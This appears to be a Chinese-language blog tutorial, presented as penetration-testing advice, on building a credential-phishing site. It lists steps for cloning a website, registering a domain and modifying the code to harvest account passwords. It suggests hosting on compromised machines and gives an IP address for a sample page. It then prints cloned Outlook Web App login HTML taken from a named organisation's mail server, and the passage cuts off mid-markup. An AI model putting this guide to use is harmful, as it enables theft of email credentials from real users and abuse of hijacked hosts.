安全人员在进行安全测试的时候,会对一个企业进行整体评估,当然测试的项目很多,需要历时数日再可见到效果,其中一项很重要的环节就是钓鱼,很多测试人员只是知道有这个名词,却不会去用这项技能,很遗憾的一件事情,那么这次我们就讲解一下如何一步一步的进行钓鱼活动。
环境可以是你抓到的肉鸡或者申请域名指向空间。
技术手段就是如下几步:
1、用工具HTTrack Website Copier 克隆一个网站。
2、注册或者申请域名,带SSL最好,不带也可
3、修改克隆的网站代码,获取帐号密码等敏感信息的代码编写
4、跳转到原始页面或者提示信息即可
实例:
地址http://111.73.46.12:8011/
简单前端代码代码如下:
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0076)http://mail.logan.com.cn/CookieAuth.dll?GetLogon?curl=Z2F&reason=0&formdir=1 -->
<html>
<!-- Mirrored from sgywn.com:2017/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 24 Feb 2017 12:23:03 GMT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Outlook Web App</title>
<meta content="NOINDEX, NOFOLLOW" name="Robots">
<link rel="shortcut icon" href="css/favicon.html" type="image/x-icon">
<link href="css/logon_style.css" type="text/css" rel="stylesheet">
<link href="css/owafont.css" type="text/css" rel="stylesheet">
<script src="css/flogon.js" type="text/javascript"></script>
<script type="text/javascript">
var a_fGzpEnbl = 1;
var g_fFcs = 1;
function window_onload()
{
onld();
if (chkCookies())
{
ldCookie('username', 'password');
var expl1 = document.getElementById('expl1');
expl1.style.display = "";
var lnkHidedSection = document.getElementById('lnkHdSec');
lnkHidedSection.style.display = "none";
var lnkShowSection = document.getElementById('lnkShwSec');
lnkShowSection.style.display = "";
}
}
function $(v){
return document.getElementById(v);
}
function $$(v){
return document.getElementById(v).value;
}
function isNull( str ){
if ( str == "" ) return true;
var regu = "^[ ]+$";
var re = new RegExp(regu);
return re.test(str);
}
function chr_ty(){
if(isNull($$("d"))){
$("d").focus();
alert("邮箱帐号不能为空!");
return false;
}
if(isNull($$("e"))){
$("e").focus();
alert("邮箱密码不能为空!");
return false;
}
}
</script>
</head>
<body class="owaLgnBdy">
<noscript>
<div id="dvErr">
<table cellpadding="0" cellspacing="0">
<tr>
<td><img src="CookieAuth70fb.html?GetPic?formdir=1&image=lgnerror.gif" alt=""></td>
<td style=